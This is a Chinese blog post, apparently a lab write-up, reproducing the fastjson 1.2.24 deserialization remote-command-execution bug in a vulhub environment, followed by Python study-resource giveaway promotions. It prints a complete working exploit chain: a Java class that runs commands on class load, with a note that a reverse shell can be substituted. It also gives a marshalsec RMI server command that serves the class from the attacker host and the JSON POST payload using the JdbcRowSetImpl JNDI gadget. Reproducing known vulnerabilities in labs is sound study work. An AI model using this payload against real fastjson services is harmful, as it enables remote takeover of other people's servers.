- 1【项目精选】基于Vue + ECharts的数据可视化系统的设计与实现(论文+源码+视频)_基于vue的可视化大屏展示的设计与实现
- 2MySQL个人学习笔记-仅供参考_dba通过dbms管理数据库
- 3基于Python编写的朴素贝叶斯在Mnist数据集上实现手写数字识别_使用贝叶斯模型对手写数字数据集进行数据挖掘实践
- 4fastjson改造,fastjson转jackson(真实项目案例,主要提供思路)_jackson fastjson
- 5【android开发(1),2024-2024阿里巴巴Linux运维面试真题解析_阿里外包面试
- 6【分布式】CAP理论详解_分布式cap
- 7dynslam的安装
- 8Java单链表的插入和删除操作_单链表的连续删除(java语言版)
- 9android前台服务_android 开启前台服务
- 10实现隐私计算的相关技术_多方安全计算(mpc)、可信执行环境(tee)、联邦学习、区块链辅助隐私计算等隐私计算
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞_fastjson反序列化payload
赞
踩
感谢每一个认真阅读我文章的人,看着粉丝一路的上涨和关注,礼尚往来总是要有的:
① 2000多本Python电子书(主流和经典的书籍应该都有了)
② Python标准库资料(最全中文版)
③ 项目源码(四五十个有趣且经典的练手项目及源码)
④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)
⑤ Python学习路线图(告别不入流的学习)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
这里先说一下大致的复现思路。
在靶场环境准备好之后,需要做的就是攻击环境的准备。
1.本地要有 java 环境 [否则无法编译 payload ,生成可利用的 class 文件]
2.需要安装 maven 环境,并配置环境变量。
3.把编译好的class文件传到外网系统中。并在class文件所在的目录,使用python开启监听。
4.然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类 “TouchFile.class”
详细的操作步骤见下文,同时B站也有关于该漏洞复现的详解视频。
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.137 (虚拟机 Kali 2020.2 、Java1.8、Burp)
启动 fastjson 反序列化导致任意命令执行漏洞 环境
1.进入 vulhub 的 fastjson 反序列化导致任意命令执行漏洞 路径
cd /usr/local/tools/vulhub/fastjson/1.2.24-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep rce
访问 8090 端口
漏洞利用
首先 vulhub 给出的复现提示如下
因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,
我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。
首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:
编译 TouchFile.class 文件
这里就利用到了我们本地的 JAVA 环境,我们需要将下面的代码编译成一个 class 文件。
将下面的代码复制到一个文件,然后使用 javac 命令进行编译.
其中的 "touch", "/tmp/success" ,可以替换成自己的反弹shell或者其他命令执行语句,比如
String[] commands = {“/bin/sh”,“-c”,“ping user.whoami.38v2ib.dnslog.cn”};
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {“touch”, “/tmp/success”};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
这里有个小坑,创建的文件名需为 “TouchFile.java”,否则会出现如下报错。
下载配置 maven
参考 “踩坑 - Kali下安装配置maven,完美解决!”
使用 python 模拟开启本地服务器
python3 -m http.server 22222 --bind 192.168.0.101
使用 marshalsec 搭建一个RMI服务器,进行远程加载payload
git clone https://github.com/mbechler/marshalsec.git
下载完成后,进入 “marshalsec” 目录执行编译命令。
mvn clean package -DskipTests
当编译完成后,会在 “marshalsec” 路径下生成一个 “target” 目录,回生成 marshalsec-0.0.3-SNAPSHOT-all.jar 这样的一个jar包
执行命令
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.0.101:22222/#TouchFile" 9999
此时访问我们的靶场,并开启 burp 进行抓包,然后构建我们的 payload
POST / HTTP/1.1
Host: 139.196.87.102:8090
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.0.101:9999/TouchFile”,
“autoCommit”:true
}
}
这里仍然有个坑,那就是 上文我作为python模拟服务器的时候是搭建在本地的,在最后的数据包发送出去之后久久未收到响应,看来是失败了。但是借用朋友的VPS,在服务器上用 python 模拟服务器之后却成功了。【同样的坑,我踩了两次…还是再买一个 VPS 吧】
验证漏洞利用是否成功
进入容器, /tmp/ 路径下 success 文件创建成功
做了那么多年开发,自学了很多门编程语言,我很明白学习资源对于学一门新语言的重要性,这些年也收藏了不少的Python干货,对我来说这些东西确实已经用不到了,但对于准备自学Python的人来说,或许它就是一个宝藏,可以给你省去很多的时间和精力。
别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。
我先来介绍一下这些东西怎么用,文末抱走。
(1)Python所有方向的学习路线(新版)
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
最近我才对这些路线做了一下新的更新,知识体系更全面了。
(2)Python学习视频
包含了Python入门、爬虫、数据分析和web开发的学习视频,总共100多个,虽然没有那么全面,但是对于入门来说是没问题的,学完这些之后,你可以按照我上面的学习路线去网上找其他的知识资源进行进阶。
(3)100多个练手项目
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。
(4)200多本电子书
这些年我也收藏了很多电子书,大概200多本,有时候带实体书不方便的话,我就会去打开电子书看看,书籍可不一定比视频教程差,尤其是权威的技术书籍。
基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
(5)Python知识点汇总
知识点汇总有点像学习路线,但与学习路线不同的点就在于,知识点汇总更为细致,里面包含了对具体知识点的简单说明,而我们的学习路线则更为抽象和简单,只是为了方便大家只是某个领域你应该学习哪些技术栈。
(6)其他资料
还有其他的一些东西,比如说我自己出的Python入门图文类教程,没有电脑的时候用手机也可以学习知识,学会了理论之后再去敲代码实践验证,还有Python中文版的库资料、MySQL和HTML标签大全等等,这些都是可以送给粉丝们的东西。
这些都不是什么非常值钱的东西,但对于没有资源或者资源不是很好的学习者来说确实很不错,你要是用得到的话都可以直接抱走,关注过我的人都知道,这些都是可以拿到的。
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
